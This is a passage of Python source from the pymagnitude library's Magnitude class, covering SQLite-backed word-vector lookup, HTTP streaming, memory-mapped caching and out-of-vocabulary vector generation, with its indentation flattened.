'logy', 'like', 'ise', 'ize', 'ful', 'ess', 'ism',
'ist', 'ish', 'ity', 'ant', 'oid', 'ory', 'ing', 'fy',
'ly', 'al']
ENGLISH_SUFFIXES = sorted(
chain.from_iterable([('-' + s, s) for s in ENGLISH_SUFFIXES]),
key=lambda x: len(x), reverse=True)
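# Both affix lists are expanded to hyphenated and plain forms and sorted longest-first,
# presumably so that the longest matching affix is preferred when stripping prefixes and
# suffixes from out-of-vocabulary keys.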
def __new__(cls, *args, **kwargs):
""" Returns a concatenated magnitude object, if Magnitude parameters """
if len(args) > 0 and isinstance(args[0], Magnitude):
obj = object.__new__(ConcatenatedMagnitude, *args, **kwargs)
obj.__init__(*args, **kwargs)
else:
obj = object.__new__(cls)
return obj
"""A Magnitude class that interfaces with the underlying SQLite
data store to provide efficient access.
Attributes:
path: The file path or URL to the magnitude file
stream: Stream the URL instead of downloading it
stream_options: Options to control the behavior of the streaming
lazy_loading: -1 = pre-load into memory, 0 = lazy loads with unbounded
in-memory cache, >0 lazy loads with an LRU cache of that
size
blocking: Even when lazy_loading is -1, the constructor will not block;
it will instead pre-load into memory in a background thread.
If blocking is set to True, it will block until everything
is pre-loaded into memory.
normalized: Returns unit normalized vectors
use_numpy: Returns a NumPy array if True or a list if False
case_insensitive: Searches for keys with case-insensitive search
pad_to_length: Pads to a certain length if examples are shorter than
that length or truncates if longer than that length.
truncate_left: if something needs to be truncated to the padding,
truncate off the left side
pad_left: Pads to the left.
placeholders: Extra empty dimensions to add to the vectors.
ngram_oov: Use character n-grams for generating out-of-vocabulary
vectors.
supress_warnings: Suppress generated warnings
batch_size: Controls the maximum vector size used in memory directly
eager: Start loading non-critical resources in the background in
anticipation they will be used.
language: A ISO 639-1 Language Code (default: English 'en')
dtype: The dtype to use when use_numpy is True.
devices: A list of GPU device ids.
temp_dir: The directory Magnitude will use as its temporary directory
log: Enable log messages from Magnitude
_number_of_values: When the path is set to None and Magnitude is being
used to solely featurize keys directly into vectors,
_number_of_values should be set to the
approximate upper-bound of the number of keys
that will be looked up with query(). If you don't know
the exact number, be conservative and pick a large
number, while keeping in mind that the bigger
_number_of_values is, the more memory it will consume.
_namespace: an optional namespace that will be prepended to each query
if provided
"""
def __init__(self, path, stream=False, stream_options=None,
lazy_loading=0, blocking=False, normalized=None,
use_numpy=True, case_insensitive=False,
pad_to_length=None, truncate_left=False,
pad_left=False, placeholders=0, ngram_oov=None,
supress_warnings=False, batch_size=3000000,
eager=None, language='en', dtype=np.float32,
devices=[], temp_dir=tempfile.gettempdir(),
log=None, _namespace=None,
_number_of_values=1000000):
"""Initializes a new Magnitude object."""
self.sqlite_lib = Magnitude.SQLITE_LIB
self.apsw_lib = Magnitude.APSW_LIB
self.closed = False
self.uid = str(uuid.uuid4()).replace("-", "")
self.stream = stream
self.stream_options = stream_options or {}
if self.stream:
if self.apsw_lib != 'internal':
raise RuntimeError(
"""You are trying to stream a model, but the
installation of Magnitude has partially failed so this
component will not work. Please try re-installing or create
a GitHub issue to further debug.""")
self.driver = apsw
self.http_vfs = HTTPVFS(options=self.stream_options)
download_vfs_options = deepcopy(self.stream_options)
download_vfs_options.update({
'sequential_cache_max_read': 500 * (1024 ** 2),
})
self.http_download_vfs = HTTPVFS(vfsname='http_download',
options=download_vfs_options)
else:
self.driver = sqlite3
self.fd = None
if path is None:
self.memory_db = True
self.path = ":memory:"
else:
self.memory_db = False
self.path = (
os.path.expanduser(path)
if not self.stream else MagnitudeUtils.download_model(
path, _download=False, _local=True))
self._all_conns = []
self.lazy_loading = lazy_loading
self.use_numpy = use_numpy
self.case_insensitive = case_insensitive
self.pad_to_length = pad_to_length
self.truncate_left = truncate_left
self.pad_left = pad_left
self.placeholders = placeholders
self.supress_warnings = supress_warnings
self.batch_size = batch_size
if eager is None:
self.eager = not(self.stream)
else:
self.eager = eager
self.language = language and language.lower()
self.dtype = dtype
if isinstance(devices, list):
self.devices = devices
else:
self.devices = [devices]
self.temp_dir = temp_dir
if log is None:
self.log = True if self.stream else log
else:
self.log = log
self._namespace = _namespace
self._number_of_values = _number_of_values
# Define conns and cursors store
self._conns = {}
self._cursors = {}
self._threads = []
# Convert the input file if not .magnitude
if self.path.endswith('.bin') or \
self.path.endswith('.txt') or \
self.path.endswith('.vec') or \
self.path.endswith('.hdf5'):
if not supress_warnings:
sys.stdout.write(
"""WARNING: You are attempting to directly use a `.bin`,
`.txt`, `.vec`, or `.hdf5` file with Magnitude. The file is being
converted to the `.magnitude` format (which is slow) so
that it can be used with this library. This will happen on
every run / re-boot of your computer. If you want to make
this faster pre-convert your vector model to the
`.magnitude` format with the built-in command utility:
`python -m pymagnitude.converter -i input_file -o output_file`
Refer to the README for more information.
You can pass `supress_warnings=True` to the constructor to
hide this message.""") # noqa
sys.stdout.flush()
from pymagnitude.converter_shared import convert as convert_vector_file # noqa
self.path = convert_vector_file(self.path)
# If the path doesn't exist locally, try a remote download
if not self.stream and not os.path.isfile(
self.path) and not self.memory_db:
self.path = MagnitudeUtils.download_model(
self.path, log=self.log, _local=True)
# Open a read-only file descriptor against the file
if not self.memory_db and not self.stream:
self.fd = os.open(self.path, os.O_RDONLY)
# Get metadata about the vectors
self.length = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='size'") \
.fetchall()[0][0]
version_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='version'") \
.fetchall()
self.version = version_query[0][0] if len(version_query) > 0 else 1
elmo_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='elmo'") \
.fetchall()
self.elmo = len(elmo_query) > 0 and elmo_query[0][0]
if ngram_oov is None:
self.ngram_oov = not(self._is_lm())
else:
self.ngram_oov = ngram_oov
if normalized is None:
self.normalized = not(self._is_lm())
else:
self.normalized = normalized
if not self.normalized:
try:
self._db().execute(
"SELECT magnitude FROM magnitude LIMIT 1")\
.fetchall()
except BaseException:
raise RuntimeError(
"""You are trying to access non-unit-normalized vectors.
However, your .magnitude file version does not support
this. Please re-download a newer .magnitude file for
this model or re-convert it if it is a custom model.""")
if CONVERTER_VERSION < self.version:
raise RuntimeError(
"""The `.magnitude` file you are using was built with a
newer version of Magnitude than your version of Magnitude.
Please update the Magnitude library as it is incompatible
with this particular `.magnitude` file.""") # noqa
self.emb_dim = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='dim'") \
.fetchall()[0][0]
self.precision = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='precision'") \
.fetchall()[0][0]
subword_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='subword'") \
.fetchall()
self.subword = len(subword_query) > 0 and subword_query[0][0]
if self.subword:
self.subword_start = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='subword_start'")\
.fetchall()[0][0]
self.subword_end = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='subword_end'") \
.fetchall()[0][0]
approx_query = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='approx'") \
.fetchall()
self.approx = len(approx_query) > 0 and approx_query[0][0]
if self.approx:
self.approx_trees = self._db().execute(
"SELECT value FROM magnitude_format WHERE key='approx_trees'")\
.fetchall()[0][0]
self.dim = self.emb_dim + self.placeholders
self.highest_entropy_dimensions = [row[0] for row in self._db().execute(
"SELECT value FROM magnitude_format WHERE key='entropy'")
.fetchall()]
duplicate_keys_query = self._db().execute(
"""SELECT value FROM magnitude_format
WHERE key='max_duplicate_keys'""").fetchall()
self.max_duplicate_keys = len(
duplicate_keys_query) > 0 and duplicate_keys_query[0][0]
if len(duplicate_keys_query) == 0:
duplicate_keys_query = self._db().execute("""
SELECT MAX(key_count)
FROM (
SELECT COUNT(key)
AS key_count
FROM magnitude
GROUP BY key
);
""").fetchall()
self.max_duplicate_keys = (
duplicate_keys_query[0][0] if duplicate_keys_query[0][0] is not None else 1) # noqa
# Iterate to pre-load
def _preload_memory():
if not self.eager: # So that it doesn't loop over the vectors twice
for key, vector in self._iter(put_cache=True, downloader=True):
pass
# Start creating mmap in background
self.setup_for_mmap = False
self._all_vectors = None
self._approx_index = None
self._elmo_embedder = None
if self.eager:
mmap_thread = threading.Thread(target=self.get_vectors_mmap,
args=(False,))
self._threads.append(mmap_thread)
mmap_thread.daemon = True
mmap_thread.start()
if self.approx:
approx_mmap_thread = threading.Thread(
target=self.get_approx_index, args=(False,))
self._threads.append(approx_mmap_thread)
approx_mmap_thread.daemon = True
approx_mmap_thread.start()
if self.elmo:
elmo_thread = threading.Thread(
target=self.get_elmo_embedder, args=(False,))
self._threads.append(elmo_thread)
elmo_thread.daemon = True
elmo_thread.start()
# Create cached methods
if self.lazy_loading <= 0:
@lru_cache(None, real_func=self._vector_for_key, remove_self=True)
def _vector_for_key_cached(*args, **kwargs):
return self._vector_for_key(*args, **kwargs)
@lru_cache(
None,
real_func=self._out_of_vocab_vector,
remove_self=True)
def _out_of_vocab_vector_cached(*args, **kwargs):
return self._out_of_vocab_vector(*args, **kwargs)
@lru_cache(None, real_func=self._key_for_index, remove_self=True)
def _key_for_index_cached(*args, **kwargs):
return self._key_for_index(*args, **kwargs)
self._vector_for_key_cached = _vector_for_key_cached
self._out_of_vocab_vector_cached = _out_of_vocab_vector_cached
self._key_for_index_cached = _key_for_index_cached
if self.lazy_loading == -1:
if blocking:
_preload_memory()
else:
preload_thread = threading.Thread(target=_preload_memory)
self._threads.append(preload_thread)
preload_thread.daemon = True
preload_thread.start()
elif self.lazy_loading > 0:
@lru_cache(
self.lazy_loading,
real_func=self._vector_for_key,
remove_self=True)
def _vector_for_key_cached(*args, **kwargs):
return self._vector_for_key(*args, **kwargs)
@lru_cache(
self.lazy_loading,
real_func=self._out_of_vocab_vector,
remove_self=True)
def _out_of_vocab_vector_cached(*args, **kwargs):
return self._out_of_vocab_vector(*args, **kwargs)
@lru_cache(
self.lazy_loading,
real_func=self._key_for_index,
remove_self=True)
def _key_for_index_cached(*args, **kwargs):
return self._key_for_index(*args, **kwargs)
self._vector_for_key_cached = _vector_for_key_cached
self._out_of_vocab_vector_cached = _out_of_vocab_vector_cached
self._key_for_index_cached = _key_for_index_cached
if self.eager and blocking:
self.get_vectors_mmap() # Wait for mmap to be available
if self.approx:
self.get_approx_index() # Wait for approx mmap to be available
if self.elmo:
self.get_elmo_embedder() # Wait for the ELMo embedder to be available
def _setup_for_mmap(self):
# Setup variables for get_vectors_mmap()
self._all_vectors = None
self._approx_index = None
self._elmo_embedder = None
if not self.memory_db:
self.db_hash = fast_md5_file(self.path, stream=self.stream)
else:
self.db_hash = self.uid
self.md5 = hashlib.md5(",".join(
[self.path, self.db_hash, str(self.length),
str(self.dim), str(self.precision), str(self.case_insensitive)
]).encode('utf-8')).hexdigest()
self.path_to_mmap = os.path.join(self.temp_dir,
self.md5 + '.magmmap')
self.path_to_approx_mmap = os.path.join(self.temp_dir,
self.md5 + '.approx.magmmap')
self.path_to_elmo_w_mmap = os.path.join(self.temp_dir,
self.md5 + '.elmo.hdf5.magmmap')
self.path_to_elmo_o_mmap = os.path.join(self.temp_dir,
self.md5 + '.elmo.json.magmmap')
if self.path_to_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_mmap] = threading.Lock()
if self.path_to_approx_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_approx_mmap] = \
threading.Lock()
if self.path_to_elmo_w_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_w_mmap] = \
threading.Lock()
if self.path_to_elmo_o_mmap not in Magnitude.MMAP_THREAD_LOCK:
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_o_mmap] = \
threading.Lock()
self.MMAP_THREAD_LOCK = Magnitude.MMAP_THREAD_LOCK[self.path_to_mmap]
self.MMAP_PROCESS_LOCK = InterProcessLock(self.path_to_mmap + '.lock')
self.APPROX_MMAP_THREAD_LOCK = \
Magnitude.MMAP_THREAD_LOCK[self.path_to_approx_mmap]
self.APPROX_MMAP_PROCESS_LOCK = \
InterProcessLock(self.path_to_approx_mmap + '.lock')
self.ELMO_W_MMAP_THREAD_LOCK = \
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_w_mmap]
self.ELMO_W_MMAP_PROCESS_LOCK = \
InterProcessLock(self.path_to_elmo_w_mmap + '.lock')
self.ELMO_O_MMAP_THREAD_LOCK = \
Magnitude.MMAP_THREAD_LOCK[self.path_to_elmo_o_mmap]
self.ELMO_O_MMAP_PROCESS_LOCK = \
InterProcessLock(self.path_to_elmo_o_mmap + '.lock')
self.setup_for_mmap = True
def sqlite3_connect(self, downloader, *args, **kwargs):
"""Returns a sqlite3 connection."""
if (self.driver != sqlite3):
if 'check_same_thread' in kwargs:
del kwargs['check_same_thread']
if self.stream:
if downloader:
kwargs['vfs'] = self.http_download_vfs.vfsname
else:
kwargs['vfs'] = self.http_vfs.vfsname
kwargs['flags'] = self.driver.SQLITE_OPEN_READONLY
return self.driver.Connection(*args, **kwargs)
else:
return self.driver.connect(*args, **kwargs)
def _db(self, force_new=False, downloader=False):
"""Returns a cursor to the database. Each thread gets its
own cursor.
"""
identifier = threading.current_thread().ident
conn_exists = identifier in self._cursors
if not conn_exists or force_new:
if self.fd:
if os.name == 'nt':
conn = self.sqlite3_connect(downloader, self.path,
check_same_thread=False)
else:
conn = self.sqlite3_connect(downloader,
'/dev/fd/%d' % self.fd,
check_same_thread=False)
elif self.stream:
conn = self.sqlite3_connect(downloader,
self.path, check_same_thread=False)
else:
conn = self.sqlite3_connect(downloader,
self.path, check_same_thread=False)
self._create_empty_db(conn.cursor())
self._all_conns.append(conn)
if not conn_exists:
self._conns[identifier] = conn
self._cursors[identifier] = conn.cursor()
elif force_new:
return conn.cursor()
return self._cursors[identifier]
def _create_empty_db(self, db):
# Calculates the number of dimensions needed to keep the probability of
# a hashing collision below a chosen error value for the expected number
# of feature values being hashed
collision_error_allowed = .001
number_of_dims = max(math.ceil(math.log(
((self._number_of_values ** 2) / (-2 * math.log(-collision_error_allowed + 1))), 100)), 2) # noqa
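# For the defaults (_number_of_values=1,000,000 and an allowed collision
# error of .001) this expression works out to 8 dimensions.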
db.execute("DROP TABLE IF EXISTS `magnitude`;")
db.execute("""
CREATE TABLE `magnitude` (
key TEXT COLLATE NOCASE,
magnitude REAL
);
""")
db.execute("""
CREATE TABLE `magnitude_format` (
key TEXT COLLATE NOCASE,
value INTEGER
);
""")
insert_format_query = """
INSERT INTO `magnitude_format`(
key,
value
)
VALUES (
?, ?
);
"""
db.execute(insert_format_query, ('size', 0))
db.execute(insert_format_query, ('dim', number_of_dims))
db.execute(insert_format_query, ('precision', 0))
def _padding_vector(self):
"""Generates a padding vector."""
if self.use_numpy:
return np.zeros((self.dim,), dtype=self.dtype)
else:
return [0.0] * self.dim
def _key_t(self, key):
"""Transforms a key to lower case depending on case
sensitivity.
"""
if self.case_insensitive and (isinstance(key, str) or
isinstance(key, unicode)):
return key.lower()
return key
def _string_dist(self, a, b):
length = max(len(a), len(b))
return length - difflib.SequenceMatcher(None, a, b).ratio() * length
def _key_shrunk_2(self, key):
"""Shrinks more than two characters to two characters
"""
return re.sub(r"([^<])\1{2,}", r"\1\1", key)
def _key_shrunk_1(self, key):
"""Shrinks more than one character to a single character
"""
return re.sub(r"([^<])\1+", r"\1", key)
def _oov_key_t(self, key):
"""Transforms a key for out-of-vocabulary lookup.
"""
is_str = isinstance(key, str) or isinstance(key, unicode)
if is_str:
key = Magnitude.BOW + self._key_t(key) + Magnitude.EOW
return is_str, self._key_shrunk_2(key)
return is_str, key
def _oov_english_stem_english_ixes(self, key):
"""Strips away common English prefixes and suffixes."""
key_lower = key.lower()
start_idx = 0
end_idx = 0
for p in Magnitude.ENGLISH_PREFIXES:
if key_lower[:len(p)] == p:
start_idx = len(p)
break
for s in Magnitude.ENGLISH_SUFFIXES:
if key_lower[-len(s):] == s:
end_idx = len(s)
break
start_idx = start_idx if max(start_idx, end_idx) == start_idx else 0
end_idx = end_idx if max(start_idx, end_idx) == end_idx else 0
stripped_key = key[start_idx:len(key) - end_idx]
if len(stripped_key) < 4:
return key
elif stripped_key != key:
return self._oov_english_stem_english_ixes(stripped_key)
else:
return stripped_key
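# Hand-traced example of the stemming above: 'preheating' loses the 'pre'
# prefix and the 'ing' suffix in a single pass, yielding 'heat'.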
def _oov_stem(self, key):
"""Strips away common prefixes and suffixes."""
if len(key) <= Magnitude.MAX_KEY_LENGTH_FOR_STEM:
if self.language == 'en':
return self._oov_english_stem_english_ixes(key)
return key
def _db_query_similar_keys_vector(
self, key, orig_key, topn=3, normalized=None):
"""Finds similar keys in the database and gets the mean vector."""
normalized = normalized if normalized is not None else self.normalized
def _sql_escape_single(s):
return s.replace("'", "''")
def _sql_escape_fts(s):
return ''.join("\\" + c if c in Magnitude.FTS_SPECIAL
else c for c in s).replace('"', '""')
exact_search_query = """
SELECT *
FROM `magnitude`
WHERE key = ?
ORDER BY key = ? COLLATE NOCASE DESC
LIMIT ?;
"""
if self.subword and len(key) < Magnitude.MAX_KEY_LENGTH_FOR_OOV_SIM:
current_subword_start = self.subword_end
BOW_length = len(Magnitude.BOW) # noqa: N806
EOW_length = len(Magnitude.EOW) # noqa: N806
BOWEOW_length = BOW_length + EOW_length # noqa: N806
true_key_len = len(key) - BOWEOW_length
key_shrunk_stemmed = self._oov_stem(self._key_shrunk_1(orig_key))
key_shrunk = self._key_shrunk_1(orig_key)
key_stemmed = self._oov_stem(orig_key)
beginning_and_end_clause = ""
exact_matches = []
if true_key_len <= 6:
beginning_and_end_clause = """
magnitude.key LIKE '{0}%'
AND LENGTH(magnitude.key) <= {2} DESC,
magnitude.key LIKE '%{1}'
AND LENGTH(magnitude.key) <= {2} DESC,"""
beginning_and_end_clause = beginning_and_end_clause.format(
_sql_escape_single(key[BOW_length:BOW_length + 1]),
_sql_escape_single(key[-EOW_length - 1:-EOW_length]),
str(true_key_len))
if key != orig_key:
exact_matches.append((key_shrunk, self._key_shrunk_2(orig_key)))
if key_stemmed != orig_key:
exact_matches.append((key_stemmed,))
if key_shrunk_stemmed != orig_key:
exact_matches.append((key_shrunk_stemmed,))
if len(exact_matches) > 0:
for exact_match in exact_matches:
results = []
split_results = []
limits = np.array_split(list(range(topn)), len(exact_match))
for i, e in enumerate(exact_match):
limit = len(limits[i])
split_results.extend(self._db().execute(
exact_search_query, (e, e, limit)).fetchall())
results.extend(self._db().execute(
exact_search_query, (e, e, topn)).fetchall())
if len(split_results) >= topn:
results = split_results
if len(results) > 0:
break
else:
results = []
if len(results) == 0:
search_query = """
SELECT magnitude.*
FROM magnitude_subword, magnitude
WHERE char_ngrams MATCH ?
AND magnitude.rowid = magnitude_subword.rowid
ORDER BY
(
(
LENGTH(offsets(magnitude_subword)) -
LENGTH(
REPLACE(offsets(magnitude_subword), ' ', '')
)
)
+
1
) DESC,
""" + beginning_and_end_clause + """
LENGTH(magnitude.key) ASC
LIMIT ?;
""" # noqa
while (len(results) < topn and
current_subword_start >= self.subword_start):
ngrams = list(char_ngrams(
key, current_subword_start, current_subword_start))
ngram_limit_map = {
6: 4,
5: 8,
4: 12,
}
while current_subword_start in ngram_limit_map and len(
ngrams) > ngram_limit_map[current_subword_start]:
# Reduce the search parameter space by sampling every
# other ngram
ngrams = ngrams[:-1][::2] + ngrams[-1:]
params = (' OR '.join('"{0}"'.format(_sql_escape_fts(n))
for n in ngrams), topn)
results = self._db().execute(search_query,
params).fetchall()
small_typo = len(results) > 0 and self._string_dist(
results[0][0].lower(), orig_key.lower()) <= 4
if key_shrunk_stemmed != orig_key and key_shrunk_stemmed != key_shrunk and not small_typo: # noqa
ngrams = list(
char_ngrams(
self._oov_key_t(key_shrunk_stemmed)[1],
current_subword_start,
self.subword_end))
params = (' OR '.join('"{0}"'.format(_sql_escape_fts(n))
for n in ngrams), topn)
results = self._db().execute(search_query,
params).fetchall()
current_subword_start -= 1
else:
# As a backup do a search with 'NOCASE'
results = self._db().execute(exact_search_query,
(orig_key, orig_key, topn)).fetchall()
final_results = []
for result in results:
result_key, vec = self._db_full_result_to_vec(
result, normalized=normalized)
final_results.append(vec)
if len(final_results) > 0:
mean_vector = np.mean(final_results, axis=0)
return mean_vector / np.linalg.norm(mean_vector)
else:
return self._padding_vector()
def _seed(self, val):
"""Returns a unique seed for val and the (optional) namespace."""
if self._namespace:
return xxhash.xxh32(
self._namespace.encode('utf-8') +
Magnitude.RARE_CHAR +
val.encode('utf-8')).intdigest()
else:
return xxhash.xxh32(val.encode('utf-8')).intdigest()
def _is_lm(self):
"""Check if using a language model"""
return self.elmo
def _process_lm_output(self, q, normalized):
"""Process the output from a language model"""
zero_d = not(isinstance(q, list))
one_d = not(zero_d) and (len(q) == 0 or not(isinstance(q[0], list)))
if self.elmo:
if zero_d:
r_val = np.concatenate(self.get_elmo_embedder().embed_batch(
[[q]])[0], axis=1).flatten()
elif one_d:
r_val = np.concatenate(self.get_elmo_embedder().embed_batch(
[q])[0], axis=1)
else:
r_val = [np.concatenate(row, axis=1)
for row in self.get_elmo_embedder().embed_batch(q)]
if normalized:
if zero_d:
r_val = r_val / np.linalg.norm(r_val)
elif one_d:
r_val = norm_matrix(r_val)
else:
r_val = [norm_matrix(row) for row in r_val]
if self.placeholders > 0 or self.ngram_oov:
shape_p = list(r_val.shape) if zero_d or one_d else \
([len(r_val)] + list(max((row.shape for row in r_val))))
shape_p[-1] = self.dim
if self.placeholders > 0:
if zero_d or one_d:
r_val_p = np.zeros(shape_p, dtype=self.dtype)
else:
r_val_p = [np.zeros(shape_p[1:], dtype=self.dtype)
for row in r_val]
else:
r_val_p = r_val
if self.ngram_oov:
if zero_d:
lookup = self._vectors_for_keys_cached(
[q], normalized=normalized, force=True)
elif one_d:
lookup = self._vectors_for_keys_cached(
q, normalized=normalized, force=True)
else:
lookup = [None] * len(q)
for row, sq in enumerate(q):
lookup[row] = self._vectors_for_keys_cached(
sq, normalized=normalized, force=True)
for idx in product(*[xrange(s) for s in shape_p[:-1]]):
if zero_d:
key = q
if self.ngram_oov:
vec = r_val if self.__contains__(key) else lookup[0]
else:
vec = r_val
r_val_p[:self.emb_dim] = vec[:self.emb_dim]
elif one_d:
key = q[idx[0]]
if self.ngram_oov:
vec = r_val[idx] if self.__contains__(key) else \
lookup[idx[0]]
else:
vec = r_val[idx]
r_val_p[idx][:self.emb_dim] = vec[:self.emb_dim]
elif idx[1] < len(q[idx[0]]):
key = q[idx[0]][idx[1]]
if self.ngram_oov:
vec = r_val[idx[0]][idx[1]] if self.__contains__(key) \
else lookup[idx[0]][idx[1]]
else:
vec = r_val[idx[0]][idx[1]]
r_val_p[idx[0]][idx[1]][:self.emb_dim] = vec[:self.emb_dim]
r_val = r_val_p
if self.use_numpy:
return r_val
else:
return r_val.tolist()
def _out_of_vocab_vector(self, key, normalized=None, force=False):
"""Generates a random vector based on the hash of the key."""
normalized = normalized if normalized is not None else self.normalized
orig_key = key
is_str, key = self._oov_key_t(key)
if self._is_lm() and is_str and not force:
return self._process_lm_output(key, normalized)
if not is_str:
seed = self._seed(type(key).__name__)
Magnitude.OOV_RNG_LOCK.acquire()
np.random.seed(seed=seed)
random_vector = np.random.uniform(-1, 1, (self.emb_dim,))
Magnitude.OOV_RNG_LOCK.release()
random_vector[-1] = self.dtype(key) / np.finfo(self.dtype).max
elif not self.ngram_oov or len(key) < Magnitude.NGRAM_BEG:
seed = self._seed(key)
Magnitude.OOV_RNG_LOCK.acquire()
np.random.seed(seed=seed)
random_vector = np.random.uniform(-1, 1, (self.emb_dim,))
Magnitude.OOV_RNG_LOCK.release()
else:
ngrams = char_ngrams(key, Magnitude.NGRAM_BEG,
Magnitude.NGRAM_END)
random_vectors = []
for i, ngram in enumerate(ngrams):
seed = self._seed(ngram)
Magnitude.OOV_RNG_LOCK.acquire()
np.random.seed(seed=seed)
random_vectors.append(
np.random.uniform(-1, 1, (self.emb_dim,)))
Magnitude.OOV_RNG_LOCK.release()
random_vector = np.mean(random_vectors, axis=0)
np.random.seed()
if self.placeholders > 0:
random_vector = np.pad(random_vector, [(0, self.placeholders)],
mode='constant', constant_values=0.0)
if is_str:
random_vector = random_vector / np.linalg.norm(random_vector)
final_vector = (
random_vector *
0.3 +
self._db_query_similar_keys_vector(
key,
orig_key,
normalized=normalized) *
0.7)
if normalized:
final_vector = final_vector / np.linalg.norm(final_vector)
else:
final_vector = random_vector
if self.use_numpy:
return final_vector
else:
return final_vector.tolist()
def _db_batch_generator(self, params):
""" Generates batches of paramaters that respect
SQLite's MAX_VARIABLE_NUMBER """
if len(params) <= Magnitude.SQLITE_MAX_VARIABLE_NUMBER:
yield params
else:
it = iter(params)
for batch in \
iter(lambda: tuple(
islice(it, Magnitude.SQLITE_MAX_VARIABLE_NUMBER)
), ()):
yield batch
def _db_result_to_vec(self, result, normalized=None):
"""Converts a database result to a vector."""
normalized = normalized if normalized is not None else self.normalized
if self.use_numpy:
vec = np.zeros((self.dim,), dtype=self.dtype)
vec[0:self.emb_dim] = result[0:self.emb_dim]
if normalized:
rv = vec / float(10**self.precision)
else:
rv = vec * (float(result[-1]) / float(10**self.precision))
else:
if normalized:
rv = [v / float(10**self.precision)
for v in islice(result, self.emb_dim)] + \
[0.0] * self.placeholders
else:
rv = [v * (float(result[-1]) / float(10**self.precision))
for v in islice(result, self.emb_dim)] + \
[0.0] * self.placeholders
return rv
def _db_full_result_to_vec(self, result, put_cache=True, normalized=None):
"""Converts a full database result to a vector."""
normalized = normalized if normalized is not None else self.normalized
result_key = result[0]
vec = self._db_result_to_vec(result[1:], normalized)
if put_cache:
self._vector_for_key_cached._cache.put(
((result_key,), frozenset([('normalized', normalized)])), vec)
return (result_key, vec)
def _vector_for_key(self, key, normalized=None):
"""Queries the database for a single key."""
normalized = normalized if normalized is not None else self.normalized
result = self._db().execute(
"""
SELECT *
FROM `magnitude`
WHERE key = ?
ORDER BY key = ? COLLATE BINARY DESC
LIMIT 1;""",
(key, key)).fetchone()
if result is None or self._key_t(result[0]) != self._key_t(key):
return None
else:
return self._db_result_to_vec(result[1:], normalized)
def _vectors_for_keys_cached(self, keys, normalized=None, force=False):
"""Queries the database for multiple keys."""
normalized = normalized if normalized is not None else self.normalized
if self._is_lm() and not force:
keys = [self._key_t(key) for key in keys]
return self._process_lm_output(keys, normalized)
cached_vectors = {key: self._query_cached(key, normalized, force) for key in keys}
unseen_keys = tuple(
key for key in keys if cached_vectors[key] is None)
unseen_keys_map = {}
if len(unseen_keys) > 0:
unseen_keys_map = {self._key_t(k): i for i, k in
enumerate(unseen_keys)}
unseen_vectors = [None] * len(unseen_keys)
seen_keys = set()
for unseen_keys_batch in self._db_batch_generator(unseen_keys):
results = self._db().execute(
"""
SELECT *
FROM `magnitude`
WHERE key
IN (""" + ' ,'.join(['?'] * len(unseen_keys_batch)) +
""");
""",
unseen_keys_batch)
for result in results:
result_key, vec = self._db_full_result_to_vec(
result, normalized=normalized)
result_key_t = self._key_t(result_key)
if result_key_t in unseen_keys_map:
i = unseen_keys_map[result_key_t]
if (
(result_key_t not in seen_keys or
result_key == unseen_keys[i]) and
(
self.case_insensitive or
result_key == unseen_keys[i])
):
seen_keys.add(result_key_t)
unseen_vectors[i] = vec
for i in range(len(unseen_vectors)):
self._vector_for_key_cached._cache.put(
((unseen_keys[i],), frozenset([('normalized', normalized)])), # noqa
unseen_vectors[i])
if unseen_vectors[i] is None:
unseen_vectors[i] = self._out_of_vocab_vector_cached(
unseen_keys[i], normalized=normalized, force=force)
vectors = [cached_vectors[key]
if key not in unseen_keys_map else
unseen_vectors[unseen_keys_map[self._key_t(key)]]
for key in keys]
return vectors
def _vectors_for_2d_keys(self, keys2d, normalized=None):
"""Queries the database for 2D keys."""
normalized = normalized if normalized is not None else self.normalized
if self._is_lm():
# Only language models benefit from this kind of 2D batching;
# SQLite is slightly faster with more batching, but only up to a
# turning point, after which the benefit disappears
keys2d = [[self._key_t(key) for key in keys] for keys in keys2d]
return self._process_lm_output(keys2d, normalized)
else:
return (self._vectors_for_keys_cached(row, normalized)
for row in keys2d)
def _key_for_index(self, index, return_vector=True):
"""Queries the database the key at a single index."""
columns = "key"
if return_vector:
columns = "*"
result = self._db().execute(
"""
SELECT """ + columns + """
FROM `magnitude`
WHERE rowid = ?
LIMIT 1;
""",
(int(index + 1),)).fetchone()
if result is None:
raise IndexError("The index %d is out-of-range" % index)
else:
if return_vector:
return self._db_full_result_to_vec(
result)
else:
return result[0]
def _keys_for_indices(self, indices, return_vector=True):
"""Queries the database for the keys of multiple indices."""
unseen_indices = tuple(int(index + 1) for index in indices
if self._key_for_index_cached._cache.get(((index,), # noqa
frozenset([('return_vector', return_vector)]))) is None) # noqa
unseen_indices_map = {}
if len(unseen_indices) > 0:
columns = "key"
if return_vector:
columns = "*"
unseen_indices_map = {(index - 1): i for i, index in
enumerate(unseen_indices)}
unseen_keys = [None] * len(unseen_indices)
for unseen_indices_batch in \
self._db_batch_generator(unseen_indices):
results = self._db().execute(
"""
SELECT rowid, """ + columns + """
FROM `magnitude`
WHERE rowid IN (""" +
' ,'.join(['?'] * len(unseen_indices_batch)) +
""");""",
unseen_indices_batch)
for result in results:
i = unseen_indices_map[result[0] - 1]
result_key = result[1]
if return_vector:
unseen_keys[i] = self._db_full_result_to_vec(
result[1:])
else:
unseen_keys[i] = result_key
self._key_for_index_cached._cache.put(
(
(unseen_indices[i] - 1,),
frozenset([('return_vector', return_vector)])
),
unseen_keys[i]
)
for i in range(len(unseen_keys)):
if unseen_keys[i] is None:
raise IndexError("The index %d is out-of-range" %
unseen_indices[i] - 1)
keys = [self.index(index, return_vector=return_vector)
if index not in unseen_indices_map else
unseen_keys[unseen_indices_map[index]] for index in indices]
return keys
